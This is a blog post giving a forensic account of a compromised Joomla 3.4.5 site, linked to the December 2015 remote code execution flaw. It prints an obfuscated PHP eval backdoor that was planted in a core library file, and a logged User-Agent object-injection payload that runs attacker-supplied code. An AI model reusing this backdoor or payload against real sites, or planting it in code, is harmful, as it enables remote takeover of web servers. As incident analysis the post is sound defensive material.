Joomla CMS 3.4.5 hacked through RCE vulnerability

Written by - 1 comments

Published on - Listed in Hacks Internet


Got a request to investigate a hack on a website using Joomla CMS. Without having more information about the nature of the hack, I started to look for recently modified files and found a couple of them with interesting filenames:

-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/images/sampledata/fruitshop/sql_95.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/components/com_users/cache_95.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/components/com_search/views/search/cache_95.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/modules/mod_footer/sql_952.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/images/sampledata/fruitshop/sql_95.php
-rw-r--r-- 1 www-data www-data 90322 Dec 20 17:18 ./example.com/plugins/finder/categories/old_95.php

These files all contained some garbled/encoded PHP coding, typically uploaded and used by hackers. Another very interesting find was this one:

-rw-r--r-- 1 www-data www-data 237 Dec 15 04:25 ./example.com/libraries/joomla/exporter.php

tail ./example.com/libraries/joomla/exporter.php
<?php if (md5($_POST['password']) == 'ee536041e2d1cab06fb46129549f13d2') { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'" . $_POST['code'] . "'\051\051\073", ''); } ?>

Interestingly this file was uploaded a couple of days before all the others so I decided to focus on it. The access_log revealed an interesting GET followed by POST:

88.198.56.140 - - [15/Dec/2015:04:24:25 +0100] "GET / HTTP/1.1" 503 4430 "http://example.com/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
46.165.230.5 - - [15/Dec/2015:04:25:00 +0100] "POST / HTTP/1.1" 503 4462 "http://example.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36"

Although the return code was 503, the hack still seems to have worked. And even more interesting is the fact, that the POST happened on Joomla itself, not a somewhere already uploaded file. A quick research revealed, that there is a vulnerability in all Joomla versions to remotely execute code (Remote Code Execution, RCE). An exploit for this vulnerability was published on December 15th 2015 (see https://www.exploit-db.com/exploits/38977/), the same day as the hack happened on this Joomla CMS. The vulnerability was fixed in Joomla 3.4.6, which was released a day prior to the hack - yet the CMS owner didn't react as fast and one day later it was already too late. 


Add a comment

Show form to leave a comment

Comments (newest first)

Zbigniew from PL wrote on May 16th, 2016:

Hello, great found, on my clietn site via this file hacker upload also a ORB shell to BqZeR.php in domain root and few other places.


RSS feed

Blog Tags:

  AWS   Android   Ansible   Apache   Apple   Atlassian   BSD   Backup   Bash   Bluecoat   CMS   Chef   Cloud   Coding   Consul   Containers   CouchDB   DB   DNS   Database   Databases   Docker   ELK   Elasticsearch   Filebeat   FreeBSD   Galera   Git   GlusterFS   Grafana   Graphics   HAProxy   HTML   Hacks   Hardware   Icinga   Influx   Internet   Java   KVM   Kibana   Kodi   Kubernetes   LVM   LXC   Linux   Logstash   Mac   Macintosh   Mail   MariaDB   Minio   MongoDB   Monitoring   Multimedia   MySQL   NFS   Nagios   Network   Nginx   OSSEC   OTRS   Office   OpenSearch   PGSQL   PHP   Perl   Personal   PostgreSQL   Postgres   PowerDNS   Proxmox   Proxy   Python   Rancher   Rant   Redis   Roundcube   SSL   Samba   Seafile   Security   Shell   SmartOS   Solaris   Surveillance   Systemd   TLS   Tomcat   Ubuntu   Unix   VMWare   VMware   Varnish   Virtualization   Windows   Wireless   Wordpress   Wyse   ZFS   Zoneminder